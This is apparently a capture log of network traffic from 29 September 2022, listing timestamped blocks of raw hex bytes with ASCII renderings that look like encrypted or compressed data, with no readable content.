                                                                                                                                                2022-09-29 12:51:28 UTC4131INData Raw: bf 4f ed 17 76 44 c7 04 26 f6 75 98 1f 82 00 1b d3 7a 4f df 2e 1e 64 5d 06 20 f2 aa d3 af 93 46 1a ed 33 fb 3f 37 fe 5a ab 04 e7 48 57 66 0b db 57 e1 9b cf cf 72 14 18 7a 3e 8d a4 6d 28 77 59 68 d8 26 a8 8e bd b9 20 7b b3 6f 6a 08 8f d9 e4 42 d9 78 9c b7 44 9a ef 53 54 69 bd ea e7 8d 54 f4 2c d7 73 80 ec c9 10 46 5e 20 0e 55 2d 4e 87 d8 21 b8 b6 c3 68 a6 fa 43 36 02 7a e2 e4 3b ce 9d 56 ce 80 0f cd 4b e7 fd 73 6a af a4 14 e6 6a ee c0 90 88 1b fb 06 bc fe 49 b5 8a e4 31 fd 7f c0 29 1e 47 7c 87 c8 ac e1 65 93 0c a6 04 6f cb b1 f8 bb c3 2f e2 a7 e8 a8 e0 3f d1 64 cd 80 32 0b 56 61 4b 62 de 4c 9e 48 87 15 05 b2 fc 97 7d bf 2c 07 8f cc bb 25 42 b9 ec d2 c8 03 ac 19 2c b0 55 ee 6f 8e dd a5 a6 b4 33 5b 22 19 09 d3 77 13 c7 40 ee b2 f8 af 38 fd 82 8a b4 01 fc c4
                                                                                                                                                Data Ascii: OvD&uzO.d] F3?7ZHWfWrz>m(wYh& {ojBxDSTiT,sF^ U-N!hC6z;VKsjjI1)G|eo/?d2VaKbLH},%B,Uo3["w@8
                                                                                                                                                2022-09-29 12:51:28 UTC4133INData Raw: c0 43 25 18 52 d0 6c d0 14 d5 d7 d0 91 ce e8 b1 1d 00 42 18 00 91 0f bc 62 2f 3c 2a e6 92 2e 9b a8 1b 64 65 d2 a4 68 87 c0 e5 e7 8a 43 6b 0f 6c 3f 83 3e f6 77 29 a5 98 32 0a 4b 95 0b af ca 38 08 b6 6e e8 a3 12 ab 22 c2 30 c0 20 1f 2d a2 00 74 5d 79 85 32 17 7c 5e b7 63 f6 9f 6c 60 81 fe 21 44 94 4c ca 6a b0 ec ae 34 d3 01 44 ea f4 09 51 af 92 45 ea 64 19 ba 61 07 08 ca 77 48 72 5d 03 32 c2 d2 2c 3a 4b 2f 3d 29 e1 f7 14 fc 27 2f 38 70 5a e8 13 bf e4 2b 37 d1 9e 28 7f db 51 71 9f f8 10 bd 87 fb 09 e8 55 89 b5 0e a6 33 fd 95 01 e8 fb 5f dd 33 51 85 7e e3 f1 ab 38 2d 28 69 62 bf 4f 37 98 c2 c4 fb c2 63 5f 2d 6a 1d b2 5a 0a 99 d4 1e 14 8f e1 6d 9d 58 e0 1c b2 10 99 97 a4 e1 5a e5 e0 90 79 74 b1 61 26 e5 e0 70 31 95 8c f5 5b c6 c4 e4 73 21 29 c7 03 f6 3c e7 13
                                                                                                                                                Data Ascii: C%RlBb/<*.dehCkl?>w)2K8n"0 -t]y2|^cl`!DLj4DQEdawHr]2,:K/=)'/8pZ+7(QqU3_3Q~8-(ibO7c_-jZmXZyta&p1[s!)<
                                                                                                                                                2022-09-29 12:51:28 UTC4134INData Raw: 87 51 21 89 d6 11 6d cb 79 45 75 40 76 16 6e f0 07 91 44 cd 9c f0 ed 25 25 f0 12 e7 0f 2b 40 f0 5b ab 96 22 21 38 09 26 cf 2c f0 5d b1 fe 24 a0 87 27 6f 71 aa a3 69 54 44 06 e6 87 2d f8 69 9f 15 18 51 ef 7a ed 8b 62 d5 ae f9 c8 53 7f 78 59 2e c7 70 bf 8e 21 d6 28 a0 2b 3d a6 75 02 04 a6 f4 45 39 93 69 4d 55 88 b6 43 8e 9f f7 91 d4 c2 e4 22 eb 0d ec 70 45 4e 0c ba ff 4a 07 d7 7e c6 0f b0 b7 c1 35 98 23 f7 a3 8e 41 82 9b d0 1d 5f 1f 1f c2 8d 55 2a 6c e9 b1 40 c1 f7 89 e0 f7 b6 0c 3e f1 50 69 66 60 0b d6 f4 c3 14 d3 33 5e 17 6f 58 d0 60 68 2e 0f e3 72 d2 1a 60 62 5b 4e 28 58 87 b5 ee d1 95 eb 97 a2 c0 bf 22 94 89 f7 e2 5d b2 c6 80 aa 6c c2 ac 16 cd 1a fd 70 95 e6 8c fb c6 a0 4d ee d3 51 b3 f1 b6 4f 6f 78 6d 4d 88 e5 34 95 f1 6d dc 81 e6 30 cf cd cc 54 c6 c7
                                                                                                                                                Data Ascii: Q!myEu@vnD%%+@["!8&,]$'oqiTD-iQzbSxY.p!(+=uE9iMUC"pENJ~5#A_U*l@>Pif`3^oX`h.r`b[N(X"]lpMQOoxmM4m0T
                                                                                                                                                2022-09-29 12:51:28 UTC4135INData Raw: 08 d2 fb 1a e4 cc c5 67 54 64 c7 63 41 52 fb 82 db 21 63 3a 9b 88 f9 a8 95 c4 c2 23 c7 ba 21 85 85 5c 7d 12 ba b6 2e 2e ef 8e 71 e5 c2 6a da eb 6e 26 b0 10 88 31 3e a6 fa 10 28 1c 15 f3 de ca 7a 61 f5 7a 3b 86 b3 1d f9 4f 0c d4 15 f6 af 5b 55 5f 2d 56 d4 6b 0b 1b a1 b5 a9 9a 40 bb e2 fb aa b6 da bb e8 5f b5 86 19 fb e5 0a ee ba a7 af 5a 68 b8 2f c3 b3 7e 26 95 c6 8e e1 6e 0e c7 0d 2e 5b 39 ae 1f 55 fc fb c4 1b a4 25 a8 7f 6c 3a c7 e6 b7 34 91 dc 7f 26 32 a0 44 77 66 0b 20 6f 3f c0 dd 14 9b f0 35 a4 fa 52 4e bf 1b 4d 0f b6 cc 84 b5 98 11 7a 2e 3b 79 b0 f7 b1 ed 42 e1 bf 20 9f d4 f1 ca e7 a7 a8 02 b2 a0 cb 8d c0 ed 5b be 21 39 7c ea b4 d4 79 02 e6 5d 51 59 63 69 6a a2 31 aa a3 68 ef 5e cf cc f9 8c 62 0e 39 af 05 11 9e 3c 54 46 33 05 19 b8 12 63 ed 42 f2 7a
                                                                                                                                                Data Ascii: gTdcAR!c:#!\}..qjn&1>(zaz;O[U_-Vk@_Zh/~&n.[9U%l:4&2Dwf o?5RNMz.;yB [!9|y]QYcij1h^b9<TF3cBz
                                                                                                                                                2022-09-29 12:51:28 UTC4137INData Raw: 03 a3 8f c7 d3 76 8f 03 20 1f e7 4e be 90 57 7a 07 33 e6 f9 b1 61 92 e8 e4 63 3d 31 df 0a 16 c9 e6 5c 97 b7 44 3c 83 9c 8f 6c 14 d4 4d 51 9d ed 00 b8 c1 05 bb 33 c9 4c 07 89 f6 fa 26 4a 49 df 17 19 76 62 d5 3c fa f7 6e 95 1e ad da 3c dd 2b 43 63 d6 5f 8c b0 bc ab e7 13 42 eb 11 51 f9 15 6a 0f e5 e6 f8 a7 05 c5 8c 69 7f b9 cf 4e 36 19 05 a5 86 09 26 cf cd 4f 21 65 2f f0 e2 07 66 1a 72 98 3d e2 bf ae 74 63 26 88 98 3f 9c 39 e6 38 ef 96 7d 1d d0 a8 48 4b 42 14 d4 d8 2c 31 6a 3a fa e9 13 a8 7c 5a 0c 2c 18 bb fc 56 d1 be 90 0a b7 e9 16 06 8a 46 fc b4 0a f2 f1 85 e3 96 16 28 b6 88 df 63 71 7e 21 9d b2 ed e6 a1 0a 79 4b 34 3d d3 b3 c9 77 11 d7 59 65 bd ea b5 88 0c 4a 42 c2 97 2d fc b6 d4 19 51 75 5f a1 e4 c3 46 23 f8 76 a7 e8 4d a1 05 0f 41 f6 46 d8 43 5b 5d d9
                                                                                                                                                Data Ascii: v NWz3ac=1\D<lMQ3L&JIvb<n<+Cc_BQjiN6&O!e/fr=tc&?98}HKB,1j:|Z,VF(cq~!yK4=wYeJB-Qu_F#vMAFC[]
                                                                                                                                                2022-09-29 12:51:28 UTC4138INData Raw: 1d e0 87 e7 91 db 41 98 a2 47 96 3d 69 fb 29 46 27 1b 98 e4 2e 23 d7 00 82 82 5e da 5d eb a5 31 f1 86 77 60 47 d0 c1 37 93 4b bd 33 e3 81 da bd f2 29 e4 02 cb ce 49 4a 28 13 47 21 08 94 36 c8 3a 4c 5e 3c 80 2c 1f c2 66 e8 24 14 2f 3b 6b cb 93 e4 46 fe 9a a5 17 ef d9 68 89 03 d3 f7 e6 ce 41 a2 73 8e cf bd 14 4e e0 74 70 93 4b 02 21 f1 71 b0 79 cc 7e 26 0d b3 f9 a1 a7 94 f8 f1 fa 6a 31 e7 ae f3 53 45 9a e9 f3 af a9 97 d7 f1 fe 34 38 55 14 cb 0b f2 69 7a 9e c2 f1 ed 60 b8 1b e4 d1 da 71 82 7f 44 01 b7 01 ab 58 aa 85 d6 07 e0 8d dc ac f3 22 0e 92 31 d4 72 7c 52 a0 27 b2 8d 33 38 ce 43 f6 4d e7 eb db 6a a1 a6 0e cc 5b b3 0f 5a 15 51 ee e1 f4 14 65 4b 9c 5e 2a 80 7e 21 d2 09 43 7d 75 49 c6 9f a3 fa ee 8c 88 95 ac 95 8a b4 ba a1 89 4f 1e 98 a0 3a 8d 08 71 f0 b3
                                                                                                                                                Data Ascii: AG=i)F'.#^]1w`G7K3)IJ(G!6:L^<,f$/;kFhAsNtpK!qy~&j1SE48Uiz`qDX"1r|R'38CMj[ZQeK^*~!C}uIO:q
                                                                                                                                                2022-09-29 12:51:28 UTC4138INData Raw: 2b a6 d8 e2 4c 8d 60 44 03 5e ef ce 4d 8f 97 ca 25 f4 b8 a1 da 9c ba 2b ed 79 4f 91 02 2d 3c a4 b7 10 3f 87 d0 f1 74 c5 2d 1a 57 39 72 39 1b 92 fd d8 2d 5e 64 4a 12 55 2c 18 5f 39 05 5e 98 17 41 8d 1d 59 fa 06 a7 67 31 86 e9 ed d8 d1 a2 b2 05 94 79 57 1e 24 57 c8 d7 99 7b 28 39 74 94 44 70 5b d0 87 c1 ea b5 f1 d9 76 28 fd 10 20 29 bd 65 cc 61 b1 3b 59 00 e5 92 39 1b 6b b2 aa 7c 3c 7b 4c 0f 41 6d 9b c8 56 41 64 19 77 97 d0 7c 59 c6 16 e9 ff 51 31 c9 70 d6 eb a2 68 6e 2f 07 c8 6b e9 db c3 8a 44 66 26 1e 6f 92 e8 9e 90 10 01 ae e9 6e 08 cd 8f a3 c4 70 03 d2 72 49 e6 5e 15 c7 0a 93 1b 9e 78 21 48 d2 03 11 22 d0 ff 7e 0e 13 7f fa 01 25 7e 08 c7 74 fe cf f7 80 73 40 d0 d3 fc 92 00 12 0d 40 54 76 53 eb 3d 33 3e 68 09 72 64 43 bd b6 e9 aa 42 28 04 de 94 19 8a 3d
                                                                                                                                                Data Ascii: +L`D^M%+yO-<?t-W9r9-^dJU,_9^AYg1yW$W{(9tDp[v( )ea;Y9k|<{LAmVAdw|YQ1phn/kDf&onprI^x!H"~%~ts@@TvS=3>hrdCB(=
                                                                                                                                                2022-09-29 12:51:28 UTC4154INData Raw: fd 32 3f 86 3d f0 dd 78 89 30 04 9e 95 69 b4 dc 1a b5 4a e6 18 38 50 9f 25 a9 a2 8f 80 55 05 e6 76 64 19 d0 a3 2b a3 51 d6 31 e7 1a d6 e5 24 d0 fa 40 17 9a e0 47 d5 37 be 2f 88 19 50 52 35 4d 5c 26 0e d4 84 51 01 0a 3c 65 2b 68 0e c5 80 bf f7 e4 c7 3d fa e9 19 a9 52 65 b7 6f d1 ff c8 e2 c6 66 c2 3a e8 87 ad d4 0d dc eb ee 0c e7 1c 5c 43 2f e0 6d 29 10 38 f6 3a 0c 30 a3 e6 cb a9 6d b9 af ee 33 0b 7f 50 6c b1 df 12 ac e3 dc d0 67 a6 01 29 6e ee 1b 43 9f 6e 8d e4 18 6e 2a c6 f6 96 ea 97 1f 3e 3d ba 2a df 22 22 a5 57 a3 bc 00 bb 14 20 ec d2 6f b0 55 3a 98 1f a9 0d 6a a0 bb 7a 7c 00 28 09 60 38 84 2b 09 a1 f6 5e d7 81 d0 77 aa f2 12 80 47 af 25 53 7d 33 bd f8 0a c4 79 bc 05 81 31 bb c2 23 65 1f 7c 4f f9 2a 69 8f f7 f5 06 f4 3d c0 0b b9 00 e2 f3 ce 13 cb 1f 76
                                                                                                                                                Data Ascii: 2?=x0iJ8P%Uvd+Q1$@G7/PR5M\&Q<e+h=Reof:\C/m)8:0m3Plg)nCnn*>=*""W oU:jz|(`8+^wG%S}3y1#e|O*i=v
                                                                                                                                                2022-09-29 12:51:28 UTC4170INData Raw: 73 d3 c3 5f c2 9a 05 48 ba 5a 5a d4 db a8 cb 8d d0 fb 64 36 e0 21 b7 bd 83 4e 9b e8 c0 9d c7 1f 22 6e 9c 2c bc 13 d0 ac d7 5f 99 91 a3 58 af af e0 f2 84 7d e5 22 7c bd d1 c8 6c a8 6d 80 2d 62 68 5f 21 fa 66 c8 99 18 40 56 8e d9 94 ce 04 ce 3b f1 52 00 a9 12 9e 44 42 90 24 14 9e 7c 20 30 47 9f a6 b2 12 63 89 97 99 05 ce a9 76 c6 42 e7 5d a5 5d 5a 0f 47 8c 2f a4 f9 ef 3c c2 44 e7 85 e6 0f cd 89 a5 f1 25 3b 9c 76 cd 24 41 44 f0 23 98 6e 90 39 c1 5c 62 e7 89 ae b4 88 4f 62 4f ce a4 00 dd b3 06 e0 f0 04 48 46 b0 8e d4 3b c8 75 99 06 e5 26 57 9b 37 ea f7 7e 52 9e 53 8d b5 29 0e b0 25 79 9a 4c 2b 12 29 53 12 d9 6c 08 24 a9 f2 10 c8 fb 95 30 d0 8f 2f c2 d5 be 01 06 02 5c 84 9b c2 3d 86 04 11 e0 89 de dc 5e b8 ce 2f 0a d6 13 43 29 2e f9 12 26 22 32 a3 e8 f8 36 88
                                                                                                                                                Data Ascii: s_HZZd6!N"n,_X}"|lm-bh_!f@V;RDB$| 0GcvB]]ZG/<D%;v$AD#n9\bObOHF;u&W7~RS)%yL+)Sl$0/\=^/C).&"26
                                                                                                                                                2022-09-29 12:51:28 UTC4186INData Raw: 54 5a ae 7b 73 61 9c 5f db 19 95 24 c5 4c 37 b5 87 c9 5a f9 94 9b 49 9c 2f 74 8a 7f a9 31 dd 72 04 bc c4 44 60 5e 9e 54 81 51 b3 8a 77 3e 48 aa a3 3a ca 15 df 81 df cf 75 3c e3 d3 51 47 0c ff c4 bc ce 74 42 a5 97 50 ef 1c 95 d2 fe 2c a5 ae 85 42 97 5b be fa bb 96 21 8a a2 60 57 87 47 d4 c0 66 ac 09 ed 92 5d c2 ee f3 2f 65 a9 06 f1 a6 a4 7e 47 34 48 39 61 29 61 03 91 50 75 9b 79 f8 8c db 69 4c cc f5 ad ff ea d4 ee f3 5f ad 1e fc 20 fd bd b1 36 88 ef 73 71 81 03 2f 3b 6d 47 fc 4b 1a 94 70 46 7c 4f ff 3c ec bf 05 6f 01 f8 dd 84 e7 6e 05 e4 cf 5f 36 2d 2b 0f 1f 97 b8 06 ec 4d f5 6e f4 d2 e4 b3 9e cb 9a 7e d4 6c b6 87 56 02 45 79 33 17 0a 49 3f 18 2a dd ec 78 56 19 1e 1d 50 1f 79 23 94 2f 0d f3 78 98 5e 7a 7e 1d 4a 54 57 15 90 46 86 d2 08 ad 77 ae 5c 21 90 e5
                                                                                                                                                Data Ascii: TZ{sa_$L7ZI/t1rD`^TQw>H:u<QGtBP,B[!`WGf]/e~G4H9a)aPuyiL_ 6sq/;mGKpF|O<on_6-+Mn~lVEy3I?*xVPy#/x^z~JTWFw\!
                                                                                                                                                2022-09-29 12:51:28 UTC4202INData Raw: c3 dd 35 e5 28 0d 54 40 4e c2 d4 fd d0 92 78 d7 85 9f 06 8c 00 ef a5 1e e4 8c c6 69 ac f8 fd 23 b5 4c 22 3f 6a 08 42 2f de 1b f8 16 73 06 87 67 6f 91 e1 3e 48 bb 76 a9 a2 cf 0b 5f 11 19 85 85 ec e0 27 f0 32 7d d7 ea f2 89 18 87 e9 df 3e 64 80 c9 b6 83 a4 0a ab 0b c0 b8 f0 e4 1e 06 bf f8 75 b2 3f 8d 6f 58 32 91 dc 0b 62 ac a2 fa 5b 94 cc 01 7f c9 42 db 2e b1 0b 24 49 6d 9b cf 3f 3d c7 f9 d2 33 b2 cc 19 f0 ad c2 b2 3c 27 64 c4 80 74 3c 80 42 b2 91 8a fc a2 95 31 1d 67 7a 5c f0 c0 0d be 5b 8e 8d b0 bd 9c 03 1f 69 cd 28 8b e3 4a 87 8f ba 70 e5 19 19 37 2a 20 54 70 05 d3 d3 e3 b1 12 65 b9 50 ec 1c fc 51 cd 35 1d c1 e4 ed 96 ad fb 4e c7 d2 96 69 13 42 7a a8 e7 b8 ec 2e e5 a5 62 9f c9 23 7d b5 4a 15 f6 ab 67 e3 cc 0d 96 f3 95 46 1a 81 61 c2 1a 15 0f 65 ed ab 99
                                                                                                                                                Data Ascii: 5(T@Nxi#L"?jB/sgo>Hv_'2}>du?oX2b[B.$Im?=3<'dt<B1gz\[i(Jp7* TpePQ5NiBz.b#}JgFae
                                                                                                                                                2022-09-29 12:51:28 UTC4218INData Raw: 59 fa 7d 54 e5 b7 f6 83 76 54 51 a1 59 de 61 3a 0e a1 9f fe a9 7a 04 92 0c 8d 1e 90 99 69 77 2a d6 cb 51 8e 90 a6 8b 10 6c 26 cb 59 1e 46 ee 4d 16 d4 25 32 59 b6 ff 4f 9e 57 57 58 47 fa bc 0b f8 1e 54 83 76 83 64 03 c1 26 1d c1 8f bb 22 df a5 9d f7 c6 ee 4f d7 bf 2f f0 a5 a1 00 d2 4e 10 56 de d1 1a 47 61 76 56 7b ac 09 73 8d 82 de 68 fa d7 2e 80 73 90 a9 3b d3 88 5f 98 fc 7e 3c ab c3 9e 44 49 f8 b1 78 d0 20 50 a7 95 d8 3d 3c 5e 7d 29 99 3a a3 be fe 0a 70 2b da 83 6a e7 a4 36 03 a5 2b 5d ad 7c 97 fd 7d 3c c5 a6 12 aa 2d 61 35 b8 6f c7 e7 7b 01 46 05 53 2b 31 27 f8 5e 0f b6 bf 1a 16 d7 ca 0e b4 e5 1b d5 da 7d 44 53 1d 47 41 90 97 b4 20 73 ce 9f e5 8d ed 02 92 85 cf a6 f3 68 1e 7d 93 d6 90 0e c2 43 92 c6 ba 03 1b a3 b8 76 60 2a c3 27 99 eb ae aa 39 fc b9 ee
                                                                                                                                                Data Ascii: Y}TvTQYa:ziw*Ql&YFM%2YOWWXGTvd&"O/NVGavV{sh.s;_~<DIx P=<^}):p+j6+]|}<-a5o{FS+1'^}DSGA sh}Cv`*'9
                                                                                                                                                2022-09-29 12:51:28 UTC4234INData Raw: 46 35 b0 0a e9 08 27 b1 f0 d2 be 9f ba cf e1 d5 ad 7f 47 25 fd b4 b1 b1 8b 1e f2 7f 35 40 37 41 3a 77 c7 8b fc 0b 7d 97 af 97 f0 d5 df 82 81 62 76 d0 27 13 9e e9 9d ef 1c 43 5c 5c 84 ea 63 9b 6b 7c 8d dc f7 17 2e 18 5b 28 2d 33 79 5a 37 68 6e 5e 16 5d 3a f6 7c 62 c6 81 54 81 f9 0e 8c b5 f1 79 90 6e 52 a1 16 f1 6e a3 31 4c e9 cd ee 96 f7 d6 f8 ae 47 99 a2 d2 3f 45 24 3b af 32 f3 4f 31 ae 48 a9 09 16 a7 d4 6d 27 29 1b d5 4c 60 66 99 cf 0e c5 99 ab d4 96 e5 9b 6f ca 16 6f dc ad cd df 66 b9 1a 80 44 29 35 d0 2f 3b a9 9a 2c 3b f6 e7 48 2c 8c 2f c3 98 04 0c 2c ca 4b 3f fd 9e bc 70 84 4d 19 0f a9 00 dd 14 d7 9c cb 6f 72 41 67 60 95 3e c1 06 96 e7 ca 9d 4c 50 bb 31 c3 63 df 12 ad 87 e7 20 a2 c7 de 59 68 f5 47 d7 7f c8 e2 d2 0b 70 8f 7d 29 20 cb 88 d1 9e d7 1f 01
                                                                                                                                                Data Ascii: F5'G%5@7A:w}bv'C\\ck|.[(-3yZ7hn^]:|bTynRn1LG?E$;2O1Hm')L`foofD)5/;,;H,/,K?pMorAg`>LP1c YhGp})
                                                                                                                                                2022-09-29 12:51:28 UTC4250INData Raw: 1d f1 2f 57 61 d0 9f ce 9c 65 c9 df 40 e8 43 53 9d 6d 47 0c e7 09 ee 5e a0 5a f2 ff f5 4f 48 9b 28 52 80 fa 1c f2 08 d8 7f ac 1c bc 32 42 b8 3c 7b fc cd 1b 95 a0 f6 23 6f f8 a1 7f de 34 ad d2 d3 87 62 6a fd c7 a9 3c 22 05 2c 6a 8b c6 7b 38 7e fa ad 64 7b 7d a0 d9 0e 4b ff 06 08 7a 4e fe ae 0c a8 87 a3 36 89 e4 07 63 b6 63 be a1 1e c9 89 39 80 a2 94 07 cf 3b ad 6a d3 bb f5 32 1b a0 f0 c6 e0 c5 9b 89 8d 91 3f aa 17 12 46 4d d7 f4 24 6f f0 c9 79 f0 6a aa de d6 7a ef d3 0a c5 27 37 34 77 59 3f 7c 93 b6 c6 a7 56 fa b9 16 21 a1 bc 18 f1 d2 5e ce 32 f7 03 dc a9 1b a6 f4 4a aa 67 61 be 7e 22 0b e8 85 7f 47 a3 13 94 20 d3 c4 17 cb 68 a6 58 07 ed 0f 16 56 35 d3 ec 9c fc c7 44 91 93 5c 5f ca f8 21 b0 0f 30 b0 19 99 a4 a6 f5 eb c2 de d0 5e ed b9 ee 68 37 59 d8 0e 1d
                                                                                                                                                Data Ascii: /Wae@CSmG^ZOH(R2B<{#o4bj<",j{8~d{}KzN6cc9;j2?FM$oyjz'74wY?|V!^2Jga~"G hXV5D\_!0^h7Y
                                                                                                                                                2022-09-29 12:51:28 UTC4266INData Raw: e4 d3 73 21 d8 d5 d1 07 31 a9 ae d7 00 1a 8e 15 3f ba e1 9d 77 66 49 47 57 b8 15 68 90 e9 17 38 38 8f a8 90 be ec e4 4b 27 8a cb 72 d1 73 0b 81 33 ba 1c 3b 90 44 a1 07 41 7e d4 a7 d5 84 1c 01 23 fa 97 6e e1 3d 32 72 2c 43 68 49 2b 5b 35 4f ea 6d 1d 87 2b 1f a7 c9 a4 56 af 6f c5 3e 1e dc 18 25 8e 1b 8f 92 0d df eb 95 73 42 e9 f1 f5 7f 10 b0 d9 a0 a8 46 1f 7e bd 89 c6 e6 35 c6 c4 8a 31 b2 d4 44 45 0a a8 51 c6 04 99 02 1b ac 36 db 5c d3 ff 18 d2 97 2f a2 13 b5 34 06 05 ea 40 0d a3 7b ee 61 ed d4 b7 fe 3f 3d 13 37 1c e9 28 f9 69 38 74 db 35 aa 5c e4 7b ba c8 3f be c1 95 db 18 45 26 aa 28 8b 14 58 67 ed b3 2b e8 6a 92 b7 0c 30 1f 54 d9 09 22 1e 32 4f 4a 53 12 e6 ca 22 71 56 1c 33 06 f7 93 ac 80 eb 65 35 5d 65 5b 29 fe 1b c3 9b e9 fc 54 1b 28 d0 9c 53 60 95 2b
                                                                                                                                                Data Ascii: s!1?wfIGWh88K'rs3;DA~#n=2r,ChI+[5Om+Vo>%sBF~51DEQ6\/4@{a?=7(i8t5\{?E&(Xg+j0T"2OJS"qV3e5]e[)T(S`+
                                                                                                                                                2022-09-29 12:51:28 UTC4282INData Raw: f9 13 60 2f 27 00 ba cf a7 69 88 9d 1e e1 76 32 d9 c0 7f e6 af 3c ac f3 6f f4 f9 8c 8c 86 7a c4 99 25 8c e5 f3 93 be 2c b5 5c ba fe 91 d7 3d eb f9 61 97 13 61 e3 a0 ad 72 d9 2a 30 85 85 da 06 4d 50 61 8b 1f 03 25 42 3c b6 93 2b 18 43 0b e3 67 00 93 d3 75 6c c6 62 ad c5 c3 e6 3b 52 6a 08 20 90 f6 8a b2 14 f2 dd da 29 f6 ec 9d 8a 45 ce 33 0b 9f 61 5d b6 0d a4 1f a1 80 e1 ad 41 79 05 16 2a f7 a5 23 e0 d9 d5 52 7b ab 34 b3 d2 61 8d b3 06 c3 e4 d4 bc 2c 1d 87 f6 9e 11 43 1e 4d 3b 62 53 e9 a3 e9 71 9a e7 80 ae 59 c4 ae 36 68 a0 01 c7 83 e5 a6 ac c4 68 37 4e 5c 2e d0 d9 4e b8 ec 18 e4 72 35 86 04 de fd cf c0 e4 4c 71 c1 53 71 0b 47 e9 ff 0b ad 60 29 df 16 90 8f 5a 43 d6 40 c0 2a 38 2b 38 6d 53 d0 4c d1 03 a0 43 35 f1 82 47 08 99 6a 0c 03 0e 28 20 f0 55 a3 c2 57
                                                                                                                                                Data Ascii: `/'iv2<oz%,\=aar*0MPa%B<+Cgulb;Rj )E3a]Ay*#R{4a,CM;bSqY6hh7N\.Nr5LqSqG`)ZC@*8+8mSLC5Gj( UW
                                                                                                                                                2022-09-29 12:51:28 UTC4298INData Raw: c8 d7 df df 21 00 d3 9c c9 e7 6a 22 d8 1a 3c 17 ad 26 6c 74 b4 ba ba ae b9 bd a3 7e 49 36 1c c2 bb 0b 53 c9 99 53 22 74 e7 0b 4c a7 9d ae d9 8b bc cd 25 b1 68 36 79 ad b6 31 0d af 0c 38 21 77 d9 e6 24 00 0e 6a 87 50 ba 62 a6 e9 5b fe b2 e1 00 95 b5 35 72 0c 3e e7 4e f6 80 70 70 cf 49 45 f7 93 cf 30 da 23 92 8c b4 e0 e0 15 0c c5 b4 e6 3f d9 85 a8 cb 92 f5 0f d4 72 c3 37 02 20 e5 fd cd 32 23 14 b3 e8 bf 07 37 b5 d7 f8 ed 6b da 6f 6b d0 bf e3 89 e3 85 35 69 af d5 93 23 f6 22 60 4a 06 49 12 13 c1 fd 66 2a bd 25 05 9d 8d a0 fd 99 f2 38 b8 e4 41 64 4e bd e5 df 96 25 c0 f6 2b 53 a9 7c 49 00 23 61 22 dd 15 e7 b8 b2 bb af 0c af 25 a4 2c 10 ab e1 45 7a a0 9d 99 bd c8 96 eb 28 d0 d3 67 46 29 87 48 33 f5 a0 8e 04 7f 00 4d 8b e7 72 0a a6 04 d0 4a 2e 62 bc 10 70 c9 c8
                                                                                                                                                Data Ascii: !j"<&lt~I6SS"tL%h6y18!w$jPb[5r>NppIE0#?r7 2#7kok5i#"`JIf*%8AdN%+S|I#a"%,Ez(gF)H3MrJ.bp
                                                                                                                                                2022-09-29 12:51:28 UTC4314INData Raw: bb c5 9f c9 a3 eb 64 0b 19 88 43 04 67 61 df 5a 6c 94 8e 61 6a a8 d0 99 f4 3a 75 0f 5d 18 da 91 c8 50 da c6 bd 32 00 31 b6 7d 41 93 34 e0 9a ae 30 28 4a ed 6f 96 ca ae 4b 21 09 2b 0f 7d c9 ca 40 22 d4 40 82 95 e9 0e a4 2f 60 dd 32 c9 c4 95 fc dc 32 e0 da cc 43 a2 8f a5 71 b8 56 ee 91 f6 9a 6d 2a bf fd 92 c6 db f3 6f c5 d4 b2 8a 37 6e bf 9e 83 c9 27 b7 77 d4 7e c2 de 4c 88 f0 ca 48 cb 57 66 9e a9 46 bb d3 e2 03 ae 8e d5 36 cf 60 d7 35 3a 07 4e e4 2e 31 9b ba af fe 57 a3 81 41 e0 52 23 0a fb 55 e2 7e 86 8a 61 81 3d 26 7b f3 1b eb 2c 31 1d d2 f3 72 4c 83 17 7e 26 cc 71 56 de 81 2b 6c e1 73 93 aa c4 b1 a3 4f 35 58 92 4b 5c af 34 c8 10 75 49 2a 44 1f dd 05 b1 75 1e e8 76 38 34 b2 41 c6 e4 12 02 69 7a 9e 7a d6 cd 83 2c 84 06 74 0e ca d7 07 ca ed 25 47 6d 60 73
                                                                                                                                                Data Ascii: dCgaZlaj:u]P21}A40(JoK!+}@"@/`22CqVm*o7n'w~LHWfF6`5:N.1WAR#U~a=&{,1rL~&qV+lsO5XK\4uI*Duv84Aizz,t%Gm`s
                                                                                                                                                2022-09-29 12:51:28 UTC4330INData Raw: 0b e7 89 e0 d9 54 26 4a 68 09 76 95 25 b5 5d 69 69 2d d8 e5 5a b5 09 5a bf 75 c6 56 7f 3b 86 1d e5 33 c8 a3 c7 71 7e 0a 79 e5 d8 90 1c 59 e8 1c 78 0b 52 89 5d cd de fc 00 e8 7b 9a 2e b4 71 27 3c 1e 44 7f f4 27 11 58 d2 8c 69 a2 76 65 b5 45 2f 29 8c ca 95 49 3e 80 ee 01 29 57 74 72 15 45 e3 9e 26 3a e5 9f fc af 37 19 5b 3f 75 f5 fd fc 0b c8 cb 20 42 5f 42 f2 8d 9c 70 b4 79 52 2d 48 f2 51 2b 1e 5f 41 cd cd 1b 6f d9 1a 1b 98 4f 8f 16 7d 18 05 cd 9b e5 59 2a 26 96 a2 b5 57 c5 f1 0e 2a e6 6c 50 3a b6 85 4a c7 f4 65 6a fd b4 f5 0d 88 49 b2 df 70 da d9 58 56 13 c6 12 09 3f 0b 46 3b 65 6e e5 b7 50 eb 5c 3a 3d 46 ba 45 50 e0 18 f3 76 2f 8b 8a 3c a6 94 58 56 cf 92 0b c3 92 c2 80 27 67 ce 4b f6 ed e1 19 57 22 f0 a8 dd 7d be 20 ac 16 19 b9 1c 6e 2b 7d b6 3d d4 6f bb
                                                                                                                                                Data Ascii: T&Jhv%]ii-ZZuV;3q~yYxR]{.q'<D'XiveE/)I>)WtrE&:7[?u B_BpyR-HQ+_AoO}Y*&W*lP:JejIpXV?F;enP\:=FEPv/<XV'gKW"} n+}=o
